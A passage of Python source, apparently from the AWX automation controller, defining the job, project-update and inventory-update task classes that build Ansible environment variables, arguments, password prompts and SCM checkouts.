for cloud_cred in job.cloud_credentials:
if cloud_cred and cloud_cred.credential_type.namespace == 'openstack' and cred_files.get(cloud_cred, ''):
env['OS_CLIENT_CONFIG_FILE'] = to_container_path(cred_files.get(cloud_cred, ''), private_data_dir)
for network_cred in job.network_credentials:
env['ANSIBLE_NET_USERNAME'] = network_cred.get_input('username', default='')
env['ANSIBLE_NET_PASSWORD'] = network_cred.get_input('password', default='')
ssh_keyfile = cred_files.get(network_cred, '')
if ssh_keyfile:
env['ANSIBLE_NET_SSH_KEYFILE'] = ssh_keyfile
authorize = network_cred.get_input('authorize', default=False)
env['ANSIBLE_NET_AUTHORIZE'] = str(int(authorize))
if authorize:
env['ANSIBLE_NET_AUTH_PASS'] = network_cred.get_input('authorize_password', default='')
path_vars = (
('ANSIBLE_COLLECTIONS_PATHS', 'collections_paths', 'requirements_collections', '~/.ansible/collections:/usr/share/ansible/collections'),
('ANSIBLE_ROLES_PATH', 'roles_path', 'requirements_roles', '~/.ansible/roles:/usr/share/ansible/roles:/etc/ansible/roles'),
)
config_values = read_ansible_config(job.project.get_project_path(), list(map(lambda x: x[1], path_vars)))
for env_key, config_setting, folder, default in path_vars:
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
def build_args(self, job, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
creds = job.machine_credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible-playbook's default of using
# the current user.
ssh_username = ssh_username or 'root'
args = []
if job.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
if job.become_enabled:
args.append('--become')
if job.diff_mode:
args.append('--diff')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
# Support prompting for multiple vault passwords
for k, v in passwords.items():
if k.startswith('vault_password'):
if k == 'vault_password':
args.append('--ask-vault-pass')
else:
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
args.append('--vault-id')
args.append('{}@prompt'.format(vault_id))
if job.forks:
if settings.MAX_FORKS > 0 and job.forks > settings.MAX_FORKS:
logger.warning(f'Maximum number of forks ({settings.MAX_FORKS}) exceeded.')
args.append('--forks=%d' % settings.MAX_FORKS)
else:
args.append('--forks=%d' % job.forks)
if job.force_handlers:
args.append('--force-handlers')
if job.limit:
args.extend(['-l', job.limit])
if job.verbosity:
args.append('-%s' % ('v' * min(5, job.verbosity)))
if job.job_tags:
args.extend(['-t', job.job_tags])
if job.skip_tags:
args.append('--skip-tags=%s' % job.skip_tags)
if job.start_at_task:
args.append('--start-at-task=%s' % job.start_at_task)
return args
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return job.playbook
def build_extra_vars_file(self, job, private_data_dir):
# Define special extra_vars for AWX, combine with job.extra_vars.
extra_vars = job.awx_meta_vars()
if job.extra_vars_dict:
extra_vars.update(json.loads(job.decrypted_extra_vars()))
# By default, all extra vars disallow Jinja2 template usage for
# security reasons; top level key-values defined in JT.extra_vars, however,
# are allowed as "safe" (because they can only be set by users with
# higher levels of privilege - those that have the ability create and
# edit Job Templates)
safe_dict = {}
if job.job_template and settings.ALLOW_JINJA_IN_EXTRA_VARS == 'template':
safe_dict = job.job_template.extra_vars_dict
return self._write_extra_vars_file(private_data_dir, extra_vars, safe_dict)
def build_credentials_list(self, job):
return job.credentials.prefetch_related('input_sources__source_credential').all()
def get_password_prompts(self, passwords={}):
d = super(RunJob, self).get_password_prompts(passwords)
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
d[r'Vault password:\s*?$'] = 'vault_password'
for k, v in passwords.items():
if k.startswith('vault_password.'):
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
d[r'Vault password \({}\):\s*?$'.format(vault_id)] = k
return d
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunJob, self).build_execution_environment_params(instance, private_data_dir)
# If this has an insights agent and it is not already mounted then show it
insights_dir = os.path.dirname(settings.INSIGHTS_SYSTEM_ID_FILE)
if instance.use_fact_cache and os.path.exists(insights_dir):
logger.info('not parent of others')
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{insights_dir}:{insights_dir}:Z",
]
)
return params
def pre_run_hook(self, job, private_data_dir):
super(RunJob, self).pre_run_hook(job, private_data_dir)
if job.inventory is None:
error = _('Job could not start because it does not have a valid inventory.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.project is None:
error = _('Job could not start because it does not have a valid project.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.execution_environment is None:
error = _('Job could not start because no Execution Environment could be found.')
self.update_model(job.pk, status='error', job_explanation=error)
raise RuntimeError(error)
elif job.project.status in ('error', 'failed'):
msg = _('The project revision for this job template is unknown due to a failed update.')
job = self.update_model(job.pk, status='failed', job_explanation=msg)
raise RuntimeError(msg)
project_path = job.project.get_project_path(check_if_exists=False)
job_revision = job.project.scm_revision
sync_needs = []
source_update_tag = 'update_{}'.format(job.project.scm_type)
branch_override = bool(job.scm_branch and job.scm_branch != job.project.scm_branch)
if not job.project.scm_type:
pass # manual projects are not synced, user has responsibility for that
elif not os.path.exists(project_path):
logger.debug('Performing fresh clone of {} on this instance.'.format(job.project))
sync_needs.append(source_update_tag)
elif job.project.scm_type == 'git' and job.project.scm_revision and (not branch_override):
try:
git_repo = git.Repo(project_path)
if job_revision == git_repo.head.commit.hexsha:
logger.debug('Skipping project sync for {} because commit is locally available'.format(job.log_format))
else:
sync_needs.append(source_update_tag)
except (ValueError, BadGitName, git.exc.InvalidGitRepositoryError):
logger.debug('Needed commit for {} not in local source tree, will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
else:
logger.debug('Project not available locally, {} will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
has_cache = os.path.exists(os.path.join(job.project.get_cache_path(), job.project.cache_id))
# Galaxy requirements are not supported for manual projects
if job.project.scm_type and ((not has_cache) or branch_override):
sync_needs.extend(['install_roles', 'install_collections'])
if sync_needs:
pu_ig = job.instance_group
pu_en = job.execution_node
sync_metafields = dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
instance_group=pu_ig,
execution_node=pu_en,
celery_task_id=job.celery_task_id,
)
if branch_override:
sync_metafields['scm_branch'] = job.scm_branch
sync_metafields['scm_clean'] = True # to accomidate force pushes
if 'update_' not in sync_metafields['job_tags']:
sync_metafields['scm_revision'] = job_revision
local_project_sync = job.project.create_project_update(_eager_fields=sync_metafields)
# save the associated job before calling run() so that a
# cancel() call on the job can cancel the project update
job = self.update_model(job.pk, project_update=local_project_sync)
project_update_task = local_project_sync._get_task_class()
try:
# the job private_data_dir is passed so sync can download roles and collections there
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
job = self.update_model(job.pk, scm_revision=local_project_sync.scm_revision)
except Exception:
local_project_sync.refresh_from_db()
if local_project_sync.status != 'canceled':
job = self.update_model(
job.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
job.refresh_from_db()
if job.cancel_flag:
return
else:
# Case where a local sync is not needed, meaning that local tree is
# up-to-date with project, job is running project current version
if job_revision:
job = self.update_model(job.pk, scm_revision=job_revision)
# Project update does not copy the folder, so copy here
RunProjectUpdate.make_local_copy(job.project, private_data_dir, scm_revision=job_revision)
if job.inventory.kind == 'smart':
# cache smart inventory memberships so that the host_filter query is not
# ran inside of the event saving code
update_smart_memberships_for_inventory(job.inventory)
def final_run_hook(self, job, status, private_data_dir, fact_modification_times):
super(RunJob, self).final_run_hook(job, status, private_data_dir, fact_modification_times)
if not private_data_dir:
# If there's no private data dir, that means we didn't get into the
# actual `run()` call; this _usually_ means something failed in
# the pre_run_hook method
return
if job.use_fact_cache:
job.finish_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', 'fact_cache'),
fact_modification_times,
)
try:
inventory = job.inventory
except Inventory.DoesNotExist:
pass
else:
if inventory is not None:
update_inventory_computed_fields.delay(inventory.id)
@task(queue=get_local_queuename)
class RunProjectUpdate(BaseTask):
model = ProjectUpdate
event_model = ProjectUpdateEvent
event_data_key = 'project_update_id'
def __init__(self, *args, job_private_data_dir=None, **kwargs):
super(RunProjectUpdate, self).__init__(*args, **kwargs)
self.playbook_new_revision = None
self.original_branch = None
self.job_private_data_dir = job_private_data_dir
def event_handler(self, event_data):
super(RunProjectUpdate, self).event_handler(event_data)
returned_data = event_data.get('event_data', {})
if returned_data.get('task_action', '') == 'set_fact':
returned_facts = returned_data.get('res', {}).get('ansible_facts', {})
if 'scm_version' in returned_facts:
self.playbook_new_revision = returned_facts['scm_version']
def build_private_data(self, project_update, private_data_dir):
"""
Return SSH private key data needed for this project update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
"""
private_data = {'credentials': {}}
if project_update.credential:
credential = project_update.credential
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
return private_data
def build_passwords(self, project_update, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key unlock and SCM
username/password.
"""
passwords = super(RunProjectUpdate, self).build_passwords(project_update, runtime_passwords)
if project_update.credential:
passwords['scm_key_unlock'] = project_update.credential.get_input('ssh_key_unlock', default='')
passwords['scm_username'] = project_update.credential.get_input('username', default='')
passwords['scm_password'] = project_update.credential.get_input('password', default='')
return passwords
def build_env(self, project_update, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunProjectUpdate, self).build_env(project_update, private_data_dir, private_data_files=private_data_files)
env['ANSIBLE_RETRY_FILES_ENABLED'] = str(False)
env['ANSIBLE_ASK_PASS'] = str(False)
env['ANSIBLE_BECOME_ASK_PASS'] = str(False)
env['DISPLAY'] = '' # Prevent stupid password popup when running tests.
# give ansible a hint about the intended tmpdir to work around issues
# like https://github.com/ansible/ansible/issues/30064
env['TMP'] = settings.AWX_ISOLATION_BASE_PATH
env['PROJECT_UPDATE_ID'] = str(project_update.pk)
if settings.GALAXY_IGNORE_CERTS:
env['ANSIBLE_GALAXY_IGNORE'] = True
# build out env vars for Galaxy credentials (in order)
galaxy_server_list = []
if project_update.project.organization:
for i, cred in enumerate(project_update.project.organization.galaxy_credentials.all()):
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_URL'] = cred.get_input('url')
auth_url = cred.get_input('auth_url', default=None)
token = cred.get_input('token', default=None)
if token:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_TOKEN'] = token
if auth_url:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_AUTH_URL'] = auth_url
galaxy_server_list.append(f'server{i}')
if galaxy_server_list:
env['ANSIBLE_GALAXY_SERVER_LIST'] = ','.join(galaxy_server_list)
return env
def _build_scm_url_extra_vars(self, project_update):
"""
Helper method to build SCM url and extra vars with parameters needed
for authentication.
"""
extra_vars = {}
if project_update.credential:
scm_username = project_update.credential.get_input('username', default='')
scm_password = project_update.credential.get_input('password', default='')
else:
scm_username = ''
scm_password = ''
scm_type = project_update.scm_type
scm_url = update_scm_url(scm_type, project_update.scm_url, check_special_cases=False)
scm_url_parts = urlparse.urlsplit(scm_url)
# Prefer the username/password in the URL, if provided.
scm_username = scm_url_parts.username or scm_username
scm_password = scm_url_parts.password or scm_password
if scm_username:
if scm_type == 'svn':
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_password = False
if scm_url_parts.scheme != 'svn+ssh':
scm_username = False
elif scm_url_parts.scheme.endswith('ssh'):
scm_password = False
elif scm_type in ('insights', 'archive'):
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_url = update_scm_url(scm_type, scm_url, scm_username, scm_password, scp_format=True)
else:
scm_url = update_scm_url(scm_type, scm_url, scp_format=True)
# Pass the extra accept_hostkey parameter to the git module.
if scm_type == 'git' and scm_url_parts.scheme.endswith('ssh'):
extra_vars['scm_accept_hostkey'] = 'true'
return scm_url, extra_vars
def build_inventory(self, instance, private_data_dir):
return 'localhost,'
def build_args(self, project_update, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
args = []
if getattr(settings, 'PROJECT_UPDATE_VVV', False):
args.append('-vvv')
if project_update.job_tags:
args.extend(['-t', project_update.job_tags])
return args
def build_extra_vars_file(self, project_update, private_data_dir):
extra_vars = {}
scm_url, extra_vars_new = self._build_scm_url_extra_vars(project_update)
extra_vars.update(extra_vars_new)
scm_branch = project_update.scm_branch
if project_update.job_type == 'run' and (not project_update.branch_override):
if project_update.project.scm_revision:
scm_branch = project_update.project.scm_revision
elif not scm_branch:
raise RuntimeError('Could not determine a revision to run from project.')
elif not scm_branch:
scm_branch = 'HEAD'
galaxy_creds_are_defined = project_update.project.organization and project_update.project.organization.galaxy_credentials.exists()
if not galaxy_creds_are_defined and (settings.AWX_ROLES_ENABLED or settings.AWX_COLLECTIONS_ENABLED):
logger.warning('Galaxy role/collection syncing is enabled, but no ' f'credentials are configured for {project_update.project.organization}.')
extra_vars.update(
{
'projects_root': settings.PROJECTS_ROOT.rstrip('/'),
'local_path': os.path.basename(project_update.project.local_path),
'project_path': project_update.get_project_path(check_if_exists=False), # deprecated
'insights_url': settings.INSIGHTS_URL_BASE,
'awx_license_type': get_license().get('license_type', 'UNLICENSED'),
'awx_version': get_awx_version(),
'scm_url': scm_url,
'scm_branch': scm_branch,
'scm_clean': project_update.scm_clean,
'scm_track_submodules': project_update.scm_track_submodules,
'roles_enabled': galaxy_creds_are_defined and settings.AWX_ROLES_ENABLED,
'collections_enabled': galaxy_creds_are_defined and settings.AWX_COLLECTIONS_ENABLED,
}
)
# apply custom refspec from user for PR refs and the like
if project_update.scm_refspec:
extra_vars['scm_refspec'] = project_update.scm_refspec
elif project_update.project.allow_override:
# If branch is override-able, do extra fetch for all branches
extra_vars['scm_refspec'] = 'refs/heads/*:refs/remotes/origin/*'
if project_update.scm_type == 'archive':
# for raw archive, prevent error moving files between volumes
extra_vars['ansible_remote_tmp'] = os.path.join(project_update.get_project_path(check_if_exists=False), '.ansible_awx', 'tmp')
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_playbook_path_relative_to_cwd(self, project_update, private_data_dir):
return os.path.join('project_update.yml')
def get_password_prompts(self, passwords={}):
d = super(RunProjectUpdate, self).get_password_prompts(passwords)
d[r'Username for.*:\s*?$'] = 'scm_username'
d[r'Password for.*:\s*?$'] = 'scm_password'
d[r'Password:\s*?$'] = 'scm_password'
d[r'\S+?@\S+?\'s\s+?password:\s*?$'] = 'scm_password'
d[r'Enter passphrase for .*:\s*?$'] = 'scm_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
# FIXME: Configure whether we should auto accept host keys?
d[r'^Are you sure you want to continue connecting \(yes/no\)\?\s*?$'] = 'yes'
return d
def _update_dependent_inventories(self, project_update, dependent_inventory_sources):
scm_revision = project_update.project.scm_revision
inv_update_class = InventoryUpdate._get_task_class()
for inv_src in dependent_inventory_sources:
if not inv_src.update_on_project_update:
continue
if inv_src.scm_last_revision == scm_revision:
logger.debug('Skipping SCM inventory update for `{}` because ' 'project has not changed.'.format(inv_src.name))
continue
logger.debug('Local dependent inventory update for `{}`.'.format(inv_src.name))
with transaction.atomic():
if InventoryUpdate.objects.filter(inventory_source=inv_src, status__in=ACTIVE_STATES).exists():
logger.debug('Skipping SCM inventory update for `{}` because ' 'another update is already active.'.format(inv_src.name))
continue
local_inv_update = inv_src.create_inventory_update(
_eager_fields=dict(
launch_type='scm',
status='running',
instance_group=project_update.instance_group,
execution_node=project_update.execution_node,
source_project_update=project_update,
celery_task_id=project_update.celery_task_id,
)
)
try:
inv_update_class().run(local_inv_update.id)
except Exception:
logger.exception('{} Unhandled exception updating dependent SCM inventory sources.'.format(project_update.log_format))
try:
project_update.refresh_from_db()
except ProjectUpdate.DoesNotExist:
logger.warning('Project update deleted during updates of dependent SCM inventory sources.')
break
try:
local_inv_update.refresh_from_db()
except InventoryUpdate.DoesNotExist:
logger.warning('%s Dependent inventory update deleted during execution.', project_update.log_format)
continue
if project_update.cancel_flag:
logger.info('Project update {} was canceled while updating dependent inventories.'.format(project_update.log_format))
break
if local_inv_update.cancel_flag:
logger.info('Continuing to process project dependencies after {} was canceled'.format(local_inv_update.log_format))
if local_inv_update.status == 'successful':
inv_src.scm_last_revision = scm_revision
inv_src.save(update_fields=['scm_last_revision'])
def release_lock(self, instance):
try:
fcntl.lockf(self.lock_fd, fcntl.LOCK_UN)
except IOError as e:
logger.error("I/O error({0}) while trying to release lock file [{1}]: {2}".format(e.errno, instance.get_lock_file(), e.strerror))
os.close(self.lock_fd)
raise
os.close(self.lock_fd)
self.lock_fd = None
'''
Note: We don't support blocking=False
'''
def acquire_lock(self, instance, blocking=True):
lock_path = instance.get_lock_file()
if lock_path is None:
# If from migration or someone blanked local_path for any other reason, recoverable by save
instance.save()
lock_path = instance.get_lock_file()
if lock_path is None:
raise RuntimeError(u'Invalid lock file path')
try:
self.lock_fd = os.open(lock_path, os.O_RDWR | os.O_CREAT)
except OSError as e:
logger.error("I/O error({0}) while trying to open lock file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
start_time = time.time()
while True:
try:
instance.refresh_from_db(fields=['cancel_flag'])
if instance.cancel_flag:
logger.debug("ProjectUpdate({0}) was canceled".format(instance.pk))
return
fcntl.lockf(self.lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as e:
if e.errno not in (errno.EAGAIN, errno.EACCES):
os.close(self.lock_fd)
logger.error("I/O error({0}) while trying to aquire lock on file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
else:
time.sleep(1.0)
waiting_time = time.time() - start_time
if waiting_time > 1.0:
logger.info('{} spent {} waiting to acquire lock for local source tree ' 'for path {}.'.format(instance.log_format, waiting_time, lock_path))
def pre_run_hook(self, instance, private_data_dir):
super(RunProjectUpdate, self).pre_run_hook(instance, private_data_dir)
# re-create root project folder if a natural disaster has destroyed it
if not os.path.exists(settings.PROJECTS_ROOT):
os.mkdir(settings.PROJECTS_ROOT)
project_path = instance.project.get_project_path(check_if_exists=False)
if not os.path.exists(project_path):
os.makedirs(project_path) # used as container mount
self.acquire_lock(instance)
self.original_branch = None
if instance.scm_type == 'git' and instance.branch_override:
if os.path.exists(project_path):
git_repo = git.Repo(project_path)
if git_repo.head.is_detached:
self.original_branch = git_repo.head.commit
else:
self.original_branch = git_repo.active_branch
stage_path = os.path.join(instance.get_cache_path(), 'stage')
if os.path.exists(stage_path):
logger.warning('{0} unexpectedly existed before update'.format(stage_path))
shutil.rmtree(stage_path)
os.makedirs(stage_path) # presence of empty cache indicates lack of roles or collections
# the project update playbook is not in a git repo, but uses a vendoring directory
# to be consistent with the ansible-runner model,
# that is moved into the runner project folder here
awx_playbooks = self.get_path_to('..', 'playbooks')
copy_tree(awx_playbooks, os.path.join(private_data_dir, 'project'))
@staticmethod
def clear_project_cache(cache_dir, keep_value):
if os.path.isdir(cache_dir):
for entry in os.listdir(cache_dir):
old_path = os.path.join(cache_dir, entry)
if entry not in (keep_value, 'stage'):
# invalidate, then delete
new_path = os.path.join(cache_dir, '.~~delete~~' + entry)
try:
os.rename(old_path, new_path)
shutil.rmtree(new_path)
except OSError:
logger.warning(f"Could not remove cache directory {old_path}")
@staticmethod
def make_local_copy(p, job_private_data_dir, scm_revision=None):
"""Copy project content (roles and collections) to a job private_data_dir
:param object p: Either a project or a project update
:param str job_private_data_dir: The root of the target ansible-runner folder
:param str scm_revision: For branch_override cases, the git revision to copy
"""
project_path = p.get_project_path(check_if_exists=False)
destination_folder = os.path.join(job_private_data_dir, 'project')
if not scm_revision:
scm_revision = p.scm_revision
if p.scm_type == 'git':
git_repo = git.Repo(project_path)
if not os.path.exists(destination_folder):
os.mkdir(destination_folder, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
tmp_branch_name = 'awx_internal/{}'.format(uuid4())
# always clone based on specific job revision
if not p.scm_revision:
raise RuntimeError('Unexpectedly could not determine a revision to run from project.')
source_branch = git_repo.create_head(tmp_branch_name, p.scm_revision)
# git clone must take file:// syntax for source repo or else options like depth will be ignored
source_as_uri = Path(project_path).as_uri()
git.Repo.clone_from(
source_as_uri,
destination_folder,
branch=source_branch,
depth=1,
single_branch=True, # shallow, do not copy full history
)
# submodules copied in loop because shallow copies from local HEADs are ideal
# and no git clone submodule options are compatible with minimum requirements
for submodule in git_repo.submodules:
subrepo_path = os.path.abspath(os.path.join(project_path, submodule.path))
subrepo_destination_folder = os.path.abspath(os.path.join(destination_folder, submodule.path))
subrepo_uri = Path(subrepo_path).as_uri()
git.Repo.clone_from(subrepo_uri, subrepo_destination_folder, depth=1, single_branch=True)
# force option is necessary because remote refs are not counted, although no information is lost
git_repo.delete_head(tmp_branch_name, force=True)
else:
copy_tree(project_path, destination_folder, preserve_symlinks=1)
# copy over the roles and collection cache to job folder
cache_path = os.path.join(p.get_cache_path(), p.cache_id)
subfolders = []
if settings.AWX_COLLECTIONS_ENABLED:
subfolders.append('requirements_collections')
if settings.AWX_ROLES_ENABLED:
subfolders.append('requirements_roles')
for subfolder in subfolders:
cache_subpath = os.path.join(cache_path, subfolder)
if os.path.exists(cache_subpath):
dest_subpath = os.path.join(job_private_data_dir, subfolder)
copy_tree(cache_subpath, dest_subpath, preserve_symlinks=1)
logger.debug('{0} {1} prepared {2} from cache'.format(type(p).__name__, p.pk, dest_subpath))
def post_run_hook(self, instance, status):
super(RunProjectUpdate, self).post_run_hook(instance, status)
# To avoid hangs, very important to release lock even if errors happen here
try:
if self.playbook_new_revision:
instance.scm_revision = self.playbook_new_revision
instance.save(update_fields=['scm_revision'])
# Roles and collection folders copy to durable cache
base_path = instance.get_cache_path()
stage_path = os.path.join(base_path, 'stage')
if status == 'successful' and 'install_' in instance.job_tags:
# Clear other caches before saving this one, and if branch is overridden
# do not clear cache for main branch, but do clear it for other branches
self.clear_project_cache(base_path, keep_value=instance.project.cache_id)
cache_path = os.path.join(base_path, instance.cache_id)
if os.path.exists(stage_path):
if os.path.exists(cache_path):
logger.warning('Rewriting cache at {0}, performance may suffer'.format(cache_path))
shutil.rmtree(cache_path)
os.rename(stage_path, cache_path)
logger.debug('{0} wrote to cache at {1}'.format(instance.log_format, cache_path))
elif os.path.exists(stage_path):
shutil.rmtree(stage_path) # cannot trust content update produced
if self.job_private_data_dir:
if status == 'successful':
# copy project folder before resetting to default branch
# because some git-tree-specific resources (like submodules) might matter
self.make_local_copy(instance, self.job_private_data_dir)
if self.original_branch:
# for git project syncs, non-default branches can be problems
# restore to branch the repo was on before this run
try:
self.original_branch.checkout()
except Exception:
# this could have failed due to dirty tree, but difficult to predict all cases
logger.exception('Failed to restore project repo to prior state after {}'.format(instance.log_format))
finally:
self.release_lock(instance)
p = instance.project
if instance.job_type == 'check' and status not in (
'failed',
'canceled',
):
if self.playbook_new_revision:
p.scm_revision = self.playbook_new_revision
else:
if status == 'successful':
logger.error("{} Could not find scm revision in check".format(instance.log_format))
p.playbook_files = p.playbooks
p.inventory_files = p.inventories
p.save(update_fields=['scm_revision', 'playbook_files', 'inventory_files'])
# Update any inventories that depend on this project
dependent_inventory_sources = p.scm_inventory_sources.filter(update_on_project_update=True)
if len(dependent_inventory_sources) > 0:
if status == 'successful' and instance.launch_type != 'sync':
self._update_dependent_inventories(instance, dependent_inventory_sources)
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunProjectUpdate, self).build_execution_environment_params(instance, private_data_dir)
project_path = instance.get_project_path(check_if_exists=False)
cache_path = instance.get_cache_path()
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{project_path}:{project_path}:Z",
f"{cache_path}:{cache_path}:Z",
]
)
return params
@task(queue=get_local_queuename)
class RunInventoryUpdate(BaseTask):
model = InventoryUpdate
event_model = InventoryUpdateEvent
event_data_key = 'inventory_update_id'
def build_private_data(self, inventory_update, private_data_dir):
"""
Return private data needed for inventory update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
If no private data is needed, return None.
"""
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
return injector.build_private_data(inventory_update, private_data_dir)
def build_env(self, inventory_update, private_data_dir, private_data_files=None):
"""Build environment dictionary for ansible-inventory.
Most environment variables related to credentials or configuration
are accomplished by the inventory source injectors (in this method)
or custom credential type injectors (in main run method).
"""
env = super(RunInventoryUpdate, self).build_env(inventory_update, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Pass inventory source ID to inventory script.
env['INVENTORY_SOURCE_ID'] = str(inventory_update.inventory_source_id)
env['INVENTORY_UPDATE_ID'] = str(inventory_update.pk)
env.update(STANDARD_INVENTORY_UPDATE_ENV)
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
if injector is not None:
env = injector.build_env(inventory_update, env, private_data_dir, private_data_files)
# All CLOUD_PROVIDERS sources implement as inventory plugin from collection
env['ANSIBLE_INVENTORY_ENABLED'] = 'auto'
if inventory_update.source == 'scm':
for env_k in inventory_update.source_vars_dict:
if str(env_k) not in env and str(env_k) not in settings.INV_ENV_VARIABLE_BLOCKED:
env[str(env_k)] = str(inventory_update.source_vars_dict[env_k])
elif inventory_update.source == 'file':
raise NotImplementedError('Cannot update file sources through the task system.')
if inventory_update.source == 'scm' and inventory_update.source_project_update:
env_key = 'ANSIBLE_COLLECTIONS_PATHS'
config_setting = 'collections_paths'
folder = 'requirements_collections'
default = '~/.ansible/collections:/usr/share/ansible/collections'
config_values = read_ansible_config(os.path.join(private_data_dir, 'project'), [config_setting])
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
env[env_key] = os.pathsep.join(paths)
if 'ANSIBLE_COLLECTIONS_PATHS' in env:
paths = env['ANSIBLE_COLLECTIONS_PATHS'].split(':')
else:
paths = ['~/.ansible/collections', '/usr/share/ansible/collections']
paths.append('/usr/share/automation-controller/collections')
env['ANSIBLE_COLLECTIONS_PATHS'] = os.pathsep.join(paths)
return env
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_args(self, inventory_update, private_data_dir, passwords):
"""Build the command line argument list for running an inventory
import.
"""
# Get the inventory source and inventory.
inventory_source = inventory_update.inventory_source
inventory = inventory_source.inventory
if inventory is None:
raise RuntimeError('Inventory Source is not associated with an Inventory.')
args = ['ansible-inventory', '--list', '--export']
# Add arguments for the source inventory file/script/thing
rel_path = self.pseudo_build_inventory(inventory_update, private_data_dir)
container_location = os.path.join(CONTAINER_ROOT, rel_path)
source_location = os.path.join(private_data_dir, rel_path)
args.append('-i')
args.append(container_location)
args.append('--output')
args.append(os.path.join(CONTAINER_ROOT, 'artifacts', str(inventory_update.id), 'output.json'))
if os.path.isdir(source_location):
playbook_dir = container_location
else:
playbook_dir = os.path.dirname(container_location)
args.extend(['--playbook-dir', playbook_dir])
if inventory_update.verbosity:
args.append('-' + 'v' * min(5, inventory_update.verbosity * 2 + 1))
return args
def build_inventory(self, inventory_update, private_data_dir):
return None # what runner expects in order to not deal with inventory
def pseudo_build_inventory(self, inventory_update, private_data_dir):
"""Inventory imports are ran through a management command
we pass the inventory in args to that command, so this is not considered
to be "Ansible" inventory (by runner) even though it is
Eventually, we would like to cut out the management command,
and thus use this as the real inventory
"""
src = inventory_update.source
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[src]()
if injector is not None:
content = injector.inventory_contents(inventory_update, private_data_dir)
# must be a statically named file
inventory_path = os.path.join(private_data_dir, 'inventory', injector.filename)
